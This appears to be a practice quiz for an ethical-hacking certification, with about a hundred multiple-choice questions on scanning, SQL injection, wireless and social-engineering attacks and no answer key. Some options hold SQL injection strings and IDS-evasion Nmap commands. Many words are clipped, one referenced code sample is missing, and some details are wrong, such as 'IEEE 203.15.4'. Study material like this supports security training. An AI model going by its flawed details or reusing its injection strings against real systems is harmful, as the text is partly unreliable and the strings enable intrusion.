Test 2 CiberSeguridad

In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?. IDEA. Triple Data Encryption Standard. AES. MD5 encryption algorithm.

John is investigating web-application firewall logs and observers that someone is attempting to inject the followin What type of attack is this?. SQL injection. Buffer overflow. CSRF. XSS.

John, a professional hacker, performs a network attack on a renowned organization and gains unauthorized access to the target network. He remains in the network without being detected for a long time and obtains sensitive information without sabotaging the organization. Which of the following attack techniques is used by John?. Insider threat. Diversion theft. Spear-phishing sites. Advanced persistent threat.

You are attempting to run an Nmap port scan on a web server. Which of the following commands would result in a scan of common ports with the least amount of noise in order to evade IDS?. nmap -A - Pn. nmap -sP -p-65535 -T5. nmap -sT -O -T0. nmap -A --host-timeout 99 -T1.

This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data, such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve. Which is this wireless security protocol?. WPA3-Personal. WPA3-Enterprise. WPA2-Enterprise. WPA2-Personal.

What are common files on a web server that can be misconfigured and provide useful information for a hacker such as verbose error messa. httpd.conf. administration.conf. php.ini. idq.dll.

Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather information about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?. Towelroot. Knative. zANTI. Bluto.

Tony is a penetration tester tasked with performing a penetration test. After gaining initial access to a target system, he finds a list of hash passwords. Which of the following tools would not be useful for cracking the hashed passwords?. Hashcat. John the Ripper. THC-Hydra. netcat.

An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization’s machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?. Service-based solutions. Product-based solutions. Tree-based assessment. Inference-based assessment.

Taylor, a security professional, uses a tool to monitor her company’s website, analyze the website’s traffic, and track the geographical location the users visiting the company’s website. Which of the following tools did Taylor employ in the above scenario?. Webroot. Web-Stat. WebSite-Watcher. WAFW00F.

Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What is the APT lifecycle phase that Harry is currently executing?. Initial intrusion. Persistence. Cleanup. Preparation.

Robin, a professional hacker, targeted an organization’s network to sniff all the traffic. During this process, Robin plugged in a rogue switch to unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the netwo What is the attack performed by Robin in the above scenario?. ARP spoofing attack. STP attack. DNS poisoning attack. VLAN hopping attack.

Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual tower to interrupt the data transmission between the user and real tower, attempting to hijack an active session. Upon receiving the user’s request, Bobby manipulated the traffic with the virtual tower redirected the victim to a malicious website. What is the attack performed by Bobby in the above scenario?. aLTEr attack. Jamming signal attack. Wardriving. KRACK attack.

John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, departmental details, and server names to launch further attacks on the target organization. What is the tool employed by John to gather information from the LDAP service?. ike-scan. Zabasearch. JXplorer. EarthExplorer.

Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks. What is the component of the Docker architecture used by Annie in the above scenario?. Docker objects. Docker daemon. Docker client. Docker registries.

Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information related to the model of the IoT device and the certifications granted to i Which of the following tools did Bob employ to gather the above information?. FCC ID search. Google image search. search.com. EarthExplorer.

What piece of hardware on a computer’s motherboard generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is not possible?. CPU. UEFI. GPU. TPM.

Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application. What is the type of web-service API mentioned in the above scenario?. RESTful API. JSON-RPC. SOAP API. REST API.

To create a botnet, the attacker can use several techniques to scan vulnerable machines. The attacker first collects information about a lar number of vulnerable machines to create a list. Subsequently, they infect the machines. The list is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time. Which technique is discussed here?. Subnet scanning technique. Permutation scanning technique. Hit-list scanning technique. Topological scanning technique.

Nicolas just found a vulnerability on a public-facing system that is considered a zero-day vulnerability. He sent an email to the owner of the public system describing the problem and how the owner can protect themselves from that vulnerability. He also sent an email to Microsoft informing them of the problem that their systems are exposed to. What type of hacker is Nicolas?. Black hat. White hat. Gray hat. Red hat.

John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed by John in the above scenario?. Agent-based scanner. Network-based scanner. Cluster scanner. Proxy scanner.

Dorian is sending a digitally signed email to Poly. With which key is Dorian signing this message and how is Poly validating it?. Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian’s private key. Dorian is signing the message with Poly’s private key, and Poly will verify that the message came from Dorian by using Dorian’s public key. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian’s public key. Dorian is signing the message with Poly’s public key, and Poly will verify that the message came from Dorian by using Dorian’s public key.

Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM at technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The sessi ID links the target employee to Boney’s account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney’s account. What is the attack performed by Boney in the above scenario?. Forbidden attack. CRIME attack. Session donation attack. Session fixation atta.

Kevin, a professional hacker, wants to penetrate CyberTech Inc’s network. He employed a technique, using which he encoded packets with Unicode characters. The company’s IDS cannot recognize the packets, but the target web server can decode them. What is the technique used by Kevin to evade the IDS system?. Session splicing. Urgency flag. Obfuscating. Desynchronization.

Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/password form, you enter the following credentials: select * from Users where UserName = ‘attack’ ’ or 1=1 -- and UserPassword = ‘123456’. select * from Users where UserName = ‘attack’ or 1=1 -- and UserPassword = ‘123456’. select * from Users where UserName = ‘attack or 1=1 -- and UserPassword = ‘123456’. select * from Users where UserName = ‘attack’ or 1=1 --’ and UserPassword = ‘123456’.

Which of the following commands checks for valid users on an SMTP server?. RCPT. CHK. VRFY. EXPN.

Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation, Bella implemented a protocol that sends data using encryption and digital certificate Which of the following protocols is used by Bella?. FTPS. FTP. HTTPS. IP.

John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?. Use his own private key to encrypt the message. Use his own public key to encrypt the message. Use Marie’s private key to encrypt the message. Use Marie’s public key to encrypt the message.

In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in?. 4.0-6.0. 3.9-6.9. 3.0-6.9. 4.0-6.9.

Bill is a network administrator. He wants to eliminate unencrypted traffic inside his company’s network. He decides to setup a SPAN port capture all traffic to the datacenter. He immediately discovers unencrypted traffic in port UD What protocol is this port using and how can he secure that traffic?. RPC and the best practice is to disable RPC completely. SNMP and he should change it to SNMP V3. SNMP and he should change it to SNMP V2, which is encrypted. It is not necessary to perform any actions, as SNMP is not carrying important information.

Bob was recently hired by a medical company after it experienced a major cyber security breach. Many patients are complaining that their personal medical records are fully exposed on the Internet and someone can find them with a simple Google search. Bob’s boss is very worried because of regulations that protect those data. Which of the following regulations is mostly violated?. PCI DSS. PII. ISO 2002. HIPPA/PHI.

Infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology?. Scanning. Gaining access. Maintaining access. Reconnaissance.

Larry, a security professional in an organization, has noticed some abnormalities in the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a few countermeasures to secure the accounts on the web server. Which of the following countermeasures must Larry implement to secure the user accounts on the web server?. Retain all unused modules and application extensions. Limit the administrator or root-level access to the minimum number of users. Enable all non-interactive accounts that should exist but do not require interactive login. Enable unused default user accounts created during the installation of an OS.

There are multiple cloud deployment options depending on how isolated a customer’s resources are from those of other customers. Shared environments share the costs and allow each customer to enjoy lower operations expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment. What is this cloud deployment option called?. Private. Community. Public. Hybrid.

Don, a student, came across a gaming app in a third-party app store and installed it. Subsequently, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app. What is the attack performed on Don in the above scenario?. SIM card attack. Clickjacking. SMS phishing attack. Agent Smith attack.

Samuel, a security administrator, is assessing the configuration of a web server. He noticed that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable attacks as the SSLv2 server can leak key information. Which of the following attacks can be performed by exploiting the above vulnerability?. Padding oracle attack. DROWN attack. DUHK attack. Side-channel attack.

Clark, a professional hacker, was hired by an organization to gather sensitive information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whois footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark in the above scenario?. DuckDuckGo. AOL. ARIN. Baidu.

You are a penetration tester and are about to perform a scan on a specific server. The agreement that you signed with the client contains t following specific condition for the scan: “The attacker must scan every port on the server several times using a set of spoofed source addresses.” Suppose that you are using Nmap to perform this scan. What flag will you use to satisfy this requirement?. The -g flag. The -A flag. The -f flag. D. The -D flag.

Abel, a security professional, conducts penetration testing in his client organization to check for any security loopholes. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all the DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. This led to a DoS attack, and as a result, legitimate employees were unable to access the client’s network. Which of the following attacks did Abel perform in the above scenario?. Rogue DHCP server attack. VLAN hopping. STP attack. DHCP starvation.

This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm?. HMAC encryption algorithm. Twofish encryption algorit. IDEA. Blowfish encryption algorithm.

Jim, a professional hacker, targeted an organization that is operating critical industrial infrastructure. Jim used Nmap to scan open ports and running services on systems connected to the organization’s OT network. He used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap commands helped Jim retrieve the required information?. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >. nmap -Pn -sU -p 44818 --script enip-info < Target IP >. nmap -Pn -sT -p 46824 < Target IP >. nmap -Pn -sT -p 102 --script s7-info < Target IP >.

While testing a web application in development, you notice that the web server does not properly ignore the “dot dot slash” (../) character string and instead returns the file listing of a folder higher up in the folder structure of the serve What kind of attack is possible in this scenario?. Cross-site scripting. SQL injection. Denial of service. Directory traversal.

Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she uses a user-defin HTTP callback or push APIs that are raised based on trigger events; when invoked, this feature supplies data to other applications so that users can instantly receive real-time information. Which of the following techniques is employed by Susan?. Web shells. Webhooks. REST API. SOAP API.

Which IOS jailbreaking technique patches the kernel during the device boot so that it becomes jailbroken after each successive reboot?. Tethered jailbreaking. Semi-untethered jailbreaking. Semi-tethered jailbreaking. Untethered jailbreaking.

Stella, a professional hacker, performs an attack on web services by exploiting a vulnerability that provides additional routing information in the SOAP header to support asynchronous communication. This further allows the transmission of web-service requests and response messages using different TCP connections. Which of the following attack techniques is used by Stella to compromise the web services?. Web services parsing attacks. WS-Address spoofing. SOAPAction spoofing. XML injection.

What is the port to block first in case you are suspicious that an IoT device has been compromise. 22. 48101. 80. 443.

Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between the domains a avoid detection. Identify the behavior of the adversary in the above scenario. Unspecified proxy activities. Use of command-line interface. Data staging. Use of DNS tunneling.

What firewall evasion scanning technique make use of a zombie system that has low network activity as well as its fragment identifica numbers?. Packet fragmentation scanning. Spoof source address scanning. Decoy scanning. Idle scanning.

By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the passwor. .xsession-log. .profile. .bashrc. .bash_history.

Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. this purpose, he uses a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API. Which of the following tools is used by Wilson in the above scenario?. Factiva. ZoomInfo. Netcraft. Infoga.

Alice, a professional hacker, targeted an organization’s cloud services. She infiltrated the target’s MSP provider by sending spear-phishing emai and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario?. Cloud cryptojacking. Man-in-the-cloud (MITC) attack. Cloud hopper attack. Cloudborne attack.

Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images: What issue occurred for the users who clicked on the image?. This php file silently executes the code and grabs the user’s session cookie and session I. The code redirects the user to another site. The code injects a new cookie to the browser. The code is a virus that is attempting to gather the user’s username and password.

Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs. Which two SQL injection types would give her the results she is looking for?. Out of band and boolean-based. Union-based and error-based. Time-based and union-based. Time-based and boolean-based.

Jason, an attacker, targeted an organization to perform an attack on its Internet-facing web server with the intention of gaining access to backend servers, which are protected by a firewall. In this process, he used a URL https://xyz.com/feed.php?url=externalsite.com/feed/to to obtain remote feed and altered the URL input to the local host to view all the local resources on the target server. What is the type of attack Jason performed in the above scenario?. Web server misconfiguration. Server-side request forgery (SSRF) attack. Web cache poisoning attack. Website defacement.

George is a security professional working for iTech Solutions. He was tasked with securely transferring sensitive data of the organization between industrial systems. In this process, he used a short-range communication protocol based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer data infrequently at a low rate in a restricted area, within a range of 10-100 m. What is the short-range wireless communication technology George employed in the above scenario?. LPWAN. MQTT. NB-IoT. Zigbee.

You are a penetration tester tasked with testing the wireless network of your client Brakeme SA. You are attempting to break into the wireless network with the SSID “Brakeme-Internal.” You realize that this network uses WPA3 encryption. Which of the following vulnerabilities is the promising to exploit?. Cross-site request forgery. Dragonblood. Key reinstallation attack. AP misconfiguration.

What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?. White-hat hacking program. Bug bounty program. Ethical hacking program. Vulnerability hunting program.

A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here?. Desynchronization. Slowloris attack. Session splicing. Phlashing.

Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in given target network. Which of the following host discovery techniques must he use to perform the given task?. UDP scan. ARP ping scan. ACK flag probe scan. TCP Maimon scan.

Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing image and sending them to the registries. Which of the following tiers of the container technology architecture is Abel currently working in?. Tier-1: Developer machines. Tier-2: Testing and accreditation systems. Tier-3: Registries. Tier-4: Orchestrators.

Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website, www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on predefined signatures. To evade any comparison statement, attempted placing characters such as “’or ‘1’=‘1’” in any basic injection statement such as “or 1=1.” Identify the evasion technique used by Daniel in the above scenario. Char encoding. IP fragmentation. Variation. Null byte.

SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application. Which of the following SQLi types leverages a database server’s ability to make DNS requests to pass data to an attacker?. In-band SQLi. Union-based SQLi. Out-of-band SQLi. Time-based blind SQLi.

Attacker Rony installed a rogue access point within an organization’s perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immedi turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario?. Wireless network assessment. Application assessment. Host-based assessment. Distributed assessment.

In this attack, an adversary tricks a victim into reinstalling an already-in-use key. This is achieved by manipulating and replaying cryptographic handshake messages. When the victim reinstalls the key, associated parameters such as the incremental transmit packet number and receive packet number are reset to their initial values. What is this attack called?. Evil twin. Chop chop attack. Wardriving. KRACK.

After an audit, the auditors inform you that there is a critical finding that you must tackle immediately. You read the audit report, and the probl is the service running on port 389. Which service is this and how can you tackle the problem?. The service is NTP, and you have to change it from UDP to TCP in order to encrypt it. The service is LDAP, and you must change it to 636, which is LDAPS. The findings do not require immediate actions and are only suggestion. The service is SMTP, and you must change it to SMIME, which is an encrypted way to send emails.

You are using a public Wi-Fi network inside a coffee shop. Before surfing the web, you use your VPN to prevent intruders from sniffing your If you did not have a VPN, how would you identify whether someone is performing an ARP spoofing attack on your lapto. You should check your ARP table and see if there is one IP address with two different MAC addresses. You should scan the network using Nmap to check the MAC addresses of all the hosts and look for duplicates. You should use netstat to check for any suspicious connections with another IP address within the LAN. You cannot identify such an attack and must use a VPN to protect your traff.

Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?. ophcrack. VisualRoute. Hootsuite. HULK.

Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure set up. Therefore, Alice bo encrypts the message and digitally signs it. Alice uses _______________ to encrypt the message, and Bryan uses _______________ to confirm the digital signature. Bryan’s public key; Bryan’s public key. Alice’s public key; Alice’s public key. Bryan’s private key; Alice’s public key. Bryan’s public key; Alice’s public key.

What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android applic. AndroidManifest.xml. classes.dex. APK.info. resources.asrc.

Mason, a professional hacker, targets an organization and spreads Emotet malware through malicious script. After infecting the victim's device, Mason further used Emotet to spread the infection across local networks and beyond to compromise as many machines as possible. In this process, he used a tool, which is a self-extracting RAR file, to retrieve information related to network resources such as writable share drive What is the tool employed by Mason in the above scenario?. NetPass.exe. Outlook scraper. WebBrowserPassView. Credential enumerator.

Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device through Bluetooth?. Bluesmacking. Bluesnarfing. Bluejacking. Bluebugging.

While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, “Learn more about your friends!”, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post legitimate, Matt responds to the questions on the post. A few days later, Matt’s bank account has been accessed, and the password has been changed. What most likely happened?. Matt inadvertently provided the answers to his security questions when responding to the post. Matt inadvertently provided his password when responding to the post. Matt’s computer was infected with a keylogger. Matt’s bank-account login information was brute forced.

Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve’s profile picture the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve start tasking about her company details and eventually gathered all the essential information regarding her company. What is the social engineering technique Steve employed in the above scenario?. Baiting. Piggybacking. Diversion theft. Honey trap.

At what stage of the cyber kill chain theory model does data exfiltration occur?. Weaponization. Actions on objectives. Command and control. Installation.

Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson’s machin What is the social engineering technique Steve employed in the above scenario?. Diversion theft. Quid pro quo. Elicitation. Phishing.

Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed. What is the port scanning technique used by Sam to discover open ports?. Xmas scan. IDLE/IPID header scan. TCP Maimon scan. ACK flag probe scan.

An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools must the organization employ to protect its critical infrastructure?. Robotium. BalenaCloud. Flowmon. IntentFuzzer.

Heather’s company has decided to use a new customer relationship management tool. After performing the appropriate research, they decided to purchase a subscription to a cloud-hosted solution. The only administrative task that Heather will need to perform is the management of user accounts. The provider will take care of the hardware, operating system, and software administration including patching and monitoring. Which of the following is this type of solution?. IaaS. SaaS. PaaS. CaaS.

Which of the following protocols can be used to secure an LDAP service against anonymous queries?. NTLM. RADIUS. WPA. SSO.

During the enumeration phase, Lawrence performs banner grabbing to obtain information such as OS details and versions of services running. The service that he enumerated runs directly on TCP port 445. Which of the following services is enumerated by Lawrence in this scenario?. Remote procedure call (RPC). Telnet. Server Message Block (SMB). Network File System (NFS).

Which file is a rich target to discover the structure of a website during web-server footprintin. domain.txt. Robots.txt. Document root. index.html.

John, a professional hacker, decided to use DNS to perform data exfiltration on a target network. In this process, he embedded malicious data in the DNS protocol packets that even DNSSEC cannot detect. Using this technique, John successfully injected malware to bypass a firewall a maintained communication with the victim machine and C&C server. What is the technique employed by John to bypass the firewal. DNSSEC zone walking. DNS cache snooping. DNS enumeration. DNS tunneling method.

There have been concerns in your network that the wireless network component is not sufficiently secure. You perform a vulnerability scan of wireless network and find that it is using an old encryption protocol that was designed to mimic wired encryption What encryption protocol is being used?. RADIUS. WPA. WEP. WPA3.

------------- is the amount of risk that remains after all risk treatment and remediation efforts have been implemented. Residual risk. Impact risk. Accepting risk. Inherent risk.

Simple web Interface that lists the collection of potentially actionable, and publicly available information is known as?. Open-source intelligence framework. Real intelligence framework. Social intelligence framework. Human intelligence framework.

Which option would you use to scan fewer ports than the default scan using Nmap tool?. -r. -F. -p. -sP.

DNS cache snooping is a type of DNS enumeration technique in which an attacker queries the DNS server for a specific cached DNS record. By using this cached record, the attacker can determine the sites recently visited by the user. What command is used to determine if the entry is present in DNS cache?. nslookup -fullrecursive www.ABCompany.com. dnsnooping -rt www.ABCompany.com. nslookup -norecurse www.ABCompany.com. dns --snoop www.ABCompany.com.

Vulnerability scanning is performed to identify vulnerabilities and misconfigurations in a target web server or network. The first step in vulnerability scanning is: OS Detection. Firewall detection. TCP/UDP Port scanning. Checking if the remote host is alive.

An attacker gains control over a user account and attempts to acquire access to another account's confidential files and information. How can he do this?. Privilege Escalation. Shoulder-Surfing. Hacking Active Directory. Port Scanning.

--------------- is usually targeted at Microsoft Office products?. Polymorphic virus. Multipartite virus. Macro virus. Stealth virus.

To ensure employees do what they’re supposed to, some employers have begun using surveillance apps and programs to monitor worker productivity. From a legal point of view, what consequences can this have?. This can slow down the network. Employers do not allow to monitor employees. To prevent invasion of privacy, the Employers can inform employees that they are being monitored. Employees should not accept it.

As a penetration tester, you find an employee list in Google and you send her an email changing the source email to her boss's email (manager@XYZ.com) and ask her some information in pdf format. She reads your email and sends back a pdf with links. You exchange the links in the PDF file with your malicious links and send back the modified pdf, saying that the links don't work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What attacking method did you use?. Social engineering. Piggybacking. Tailgating. Eavesdropping.

With botnets, the attacker can use several techniques to scan vulnerable machines. The attacker first creates a list of a large number of vulnerable machines, Then, they infect the machines to find the newly compromised machines. On finding one, the attacker installs malicious code on it and divides the list in half. This technique ensures the installation of malicious code on all the potentially vulnerable machines in a short time. The technique which is discussed here is: Subnet scanning technique. Permutation scanning technique. Hit-list scanning technique. Topological scanning technique.

To withdraw money from an ATM machine, you are using your smart card and PIN, in this case you are using a two-factor authentication that satisfies: Something you are and something you remember. Something you have and something you know. Something you know and something you are. Something you have and something you are.

-------------- is an extremely common IDS evasion technique used by attackers?. Spyware. Subnetting. Unicode Characters. Port Knocking.

Clients of a company tried to connect to the main site of the company but they were redirected to a malicious site. Cybersecurity team, found that they were victims of DNS Cache Poisoning. What should security team do to deal with threats like this?. The change of Anti-Virus. The use of DNSSEC. The use of multi-Factor authentication. Client training and awareness.

While You are connecting to your online bank account, you receive an email with a link. You click on the link and it opens another Web page and displays a video. Later, you receive an email from your bank showing that someone accessed to your bank account. What Web browser-based security vulnerability was exploited to compromise the user?. Clickjacking. Cross-Site Scripting. Cross-Site Request Forgery. Web form input validation.

In an SQL injection attack, the attacker injects malicious code through an SQL query that can read sensitive data and even can modify (insert/update/delete) it. Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker?. In-band SQLi. Union-based SQLi. Out-of-band SQLi. Time-based blind SQLi.

Bob's computer is configured to join an 802.11 network. His computer is same as many other users in the network. He can find the WIFI but he is not able to connect. He uses a wireless packet sniffer and it shows that the Wireless Access Point (WAP) is not responding to the association requests from his computer. What is a possible source of this problem?. Client's MAC address doesn't match the AP's access list. The SSID of the wireless network is hidden. Client is configured for the wrong channel. DHCP is not enabled on the wireless client.

An attacker infected a public computer and a user connected his iPhone mobile to this computer. The user then enabled iTunes Wi-Fi sync on the computer so that the device could continue communication with that computer even after being physically disconnected. Now, the attacker gains access to the user's iPhone through the infected computer and is able to monitor and read all of user's activity on the iPhone, even after the device is out of the communication zone. Which of the following attacks is performed by attacker in the above scenario?. Man-in-the-disk attack. iOS jailbreaking. iOS trustjacking. Signalling System 7 vulnerability.

Which of the following tools an attacker can employ to gather information related to the model of the IoT device and the certifications granted to it?. FCC ID search. Google Lens. Shodan.io. EarthExplorer.

What is the component of the Docker architecture that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks?. Docker objects. Docker daemon. Docker client. Docker registries.

Which PKI components can Issue and verify digital certificates?. KDC. CR. CBC. CA.

Biometrics is the measurement and statistical analysis of people's unique physical and behavioral characteristics. Which option is the least-likely physical characteristic to be used in biometric control?. Iris patterns. Voice. Height and Weight. Fingerprints.

To maximize the trust level of a phishing message, hackers create the email to look similar to the internal email used by the target company. They normally add logos and use the name of the company CEO, or Managers. Gathering information about the target organization by searching the Internet or through social engineering is known as?. Internet searching. Investigation. Reconnaissance. Enumeration.

ICMP and Ping may be disabled on a target computer. Which tool can you use to get a response from a host using TCP?. Traceroute. Hping. TCP ping. Broadcast ping.

What document lists the detailed guidelines and constraints regarding the execution of information security testing. It is established before the start of a security test, and gives the test team authority to conduct defined activities without the need for additional permissions?. Service Level Agreement. Project Scope. Rules of Engagement. Non-Disclosure Agreement.

A penetration test considered to be more accurate than vulnerability scan, Because: vulnerability scanning is offensive in nature. A penetration test attempts to actively exploit weaknesses in an environment, while vulnerability scanning checks for known vulnerabilities and generates a report on risk exposure. A penetration test is often performed by an automated tool, while a vulnerability scan is always a human factor involved. Penetration testers Typically conducted by in-house staff using authenticated credentials; does not require a high skill level.

An organization that has experienced a possible breach of security, asks you as an incident investigator to check the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network. During checking you find out that the sequence of many of the logged events do not match up. What is the most likely cause?. The network devices are not all synchronized. A network outage was the root casue. The attacker manipulated and tweaked event logs. It can be a false alarm.

Ransomware is a type of malware that uses encryption to block a user's access to his/her device either by locking the screen or by locking the user's files. Which of the following is the best countermeasure an organisation can use to help avoid or reduce the impact of ransomware?. Use multiple antivirus softwares. Pay the ransom. Store backups offsite. Analyse the ransomware and search to find the decryption key.

ABCompany is worried about someone tracking it online with a packet sniffer. Which option is the BEST way to defend against network sniffing?. Encrypt all the traffic that leaves your system. Use Endpoint Protection solutions and keep all servers updated (patched). Assign fixed IP addresses by DHCP. Access the server room via controlled doors only.

SOC tools in your company, show a high number of outbound connections from your internal IP addresses to a single public IP address. After further analysis, you find out that this Public IP is a blacklisted IP, and the internal communicating devices are compromised. What kind of attack does the above scenario demonstrate?. Botnet Attack. Spear Phishing Attack. Advanced Persistent Threats. Rootkit Attack.

To take down web infrastructure using a DDoS attack, attacker sends Partial HTTP requests to the web infrastructure or applications. Upon receiving a partial request, the target server opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here?. Desynchronization. Slowloris attack. Session splicing. Phlashing.

Cookies are small packets of data saved as text files on the web browser of your computer or other devices, from a security perspective, you could consider regularly clearing the cookies from your computer or device. What sort of security breach is it attempting to mitigate?. Might upload malicious programs or obtain passwords. Access the authentication cookie to hijack the victim's session. Intercept confidential data delivered in JSON format. Execute scripts in the user's web browser.

Your firewall is configured to allow outbound HTTP traffic, while IRC traffic over port 80 from a compromised web enabled host got blocked. What type of firewall is inspecting outbound traffic?. Circuit. Stateful. Application. Packet Filtering.

